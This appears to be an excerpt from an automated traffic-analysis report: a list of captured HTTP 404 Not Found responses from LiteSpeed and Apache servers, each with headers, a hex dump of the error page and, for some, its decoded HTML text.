                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 29 Oct 2024 15:55:52 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 29 Oct 2024 15:55:54 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Tue, 29 Oct 2024 15:55:57 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:03 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:05 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:08 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:08 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:10 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:19 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
